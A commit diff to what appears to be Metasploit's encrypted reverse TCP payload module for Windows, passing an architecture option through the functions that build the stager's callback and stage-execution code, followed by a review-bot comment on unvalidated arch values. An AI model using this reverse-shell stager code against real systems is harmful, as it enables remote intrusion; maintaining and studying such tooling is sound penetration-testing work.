
Commit 08266be

committed
Pass around the conf and opts to share the arch
1 parent 9a34505 commit 08266be


1 file changed

+20
-18
lines changed

1 file changed

+20
-18
lines changed

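--- a/lib/msf/core/payload/windows/encrypted_reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/encrypted_reverse_tcp.rb
@@ -61,9 +61,9 @@ def generate(opts={})
 
 src = ''
 if staged?
-src = generate_stager(conf)
+src = generate_stager(conf, opts)
 else
-src = generate_c_src(conf)
+src = generate_c_src(conf, opts)
 end
 
 link_script = module_info['DefaultOptions']['LinkerScript']
@@ -92,9 +92,9 @@ def generate(opts={})
 comp_code
 end
 
-def initial_code
+def initial_code(conf, opts = {})
 src = headers
-src << align_rsp if self.arch_to_s.eql?('x64')
+src << align_rsp if opts.fetch(:arch, self.arch_to_s).eql?('x64')
 
 if staged?
 src << chacha_func_staged
@@ -104,8 +104,8 @@ def initial_code
 src << exit_proc
 end
 
-def generate_stager(conf)
-src = initial_code
+def generate_stager(conf, opts = {})
+src = initial_code(conf, opts)
 
 if conf[:call_wsastartup]
 src << init_winsock
@@ -115,7 +115,7 @@ def generate_stager(conf)
 src << get_load_library(conf[:host], conf[:port])
 src << call_init_winsock if conf[:call_wsastartup]
 src << start_comm(conf[:uuid])
-src << stager_comm
+src << stager_comm(conf, opts)
 end
 
 def sends_hex_uuid?
@@ -148,21 +148,21 @@ def generate_stage(opts={})
 keep_exe: datastore['KeepExe'],
 show_compile_cmd: datastore['ShowCompileCMD'],
 f_name: Tempfile.new('reverse_pic_stage').path,
-arch: self.arch_to_s
+arch: opts.fetch(:arch, self.arch_to_s)
 }
 
-src = initial_code
+src = initial_code(conf, opts)
 src << get_new_key
 src << init_proc
-src << exec_payload_stage
+src << exec_payload_stage(conf, opts)
 shellcode = get_compiled_shellcode(src, comp_opts)
 
 stage_obj = Rex::Crypto::Chacha20.new(key, iv)
 stage_obj.chacha20_crypt(shellcode)
 end
 
-def generate_c_src(conf)
-src = initial_code
+def generate_c_src(conf, opts = {})
+src = initial_code(conf, opts)
 
 if conf[:call_wsastartup]
 src << init_winsock
@@ -552,9 +552,10 @@ def single_comm
 ^
 end
 
-def stager_comm
-reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
-inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
+def stager_comm(conf, opts = {})
+arch = opts.fetch(:arch, self.arch_to_s)
+reg = arch.eql?('x86') ? 'edi' : 'rdi'
+inst = arch.eql?('x86') ? 'movl' : 'movq'
 
 %Q^
 FuncRecv RecvData = (FuncRecv) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'recv')}); // hash('ws2_32.dll', 'recv') -> 0x5fc8d902
@@ -596,9 +597,10 @@ def stager_comm
 ^
 end
 
-def exec_payload_stage
-reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
-inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
+def exec_payload_stage(conf, opts = {})
+arch = opts.fetch(:arch, self.arch_to_s)
+reg = arch.eql?('x86') ? 'edi' : 'rdi'
+inst = arch.eql?('x86') ? 'movl' : 'movq'
 
 %Q^
 void ExecutePayload()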
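Review bot: The new `opts.fetch(:arch, self.arch_to_s)` lookup is copied into `initial_code`, `generate_stage`, `stager_comm` and `exec_payload_stage`, and the value it returns is never normalised or validated. `initial_code` compares it with `'x64'` while the two comm helpers compare it with `'x86'`, so an `:arch` that is present but is neither of those strings (nil, a symbol, an array) would skip `align_rsp` and still select `rdi`/`movq`, giving generated source that is consistent with neither architecture. I would resolve it once in a private helper, for example `arch = (opts[:arch] || arch_to_s).to_s` followed by `raise ArgumentError, "unsupported arch: #{arch}" unless %w[x86 x64].include?(arch)`, and call that helper from all four places. `conf` is not read in the visible lines of the three helpers that now accept it, and its assignment in `generate_stage` is outside the hunk; the helper bodies also continue past the hunks, so both points are worth confirming against the full file.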
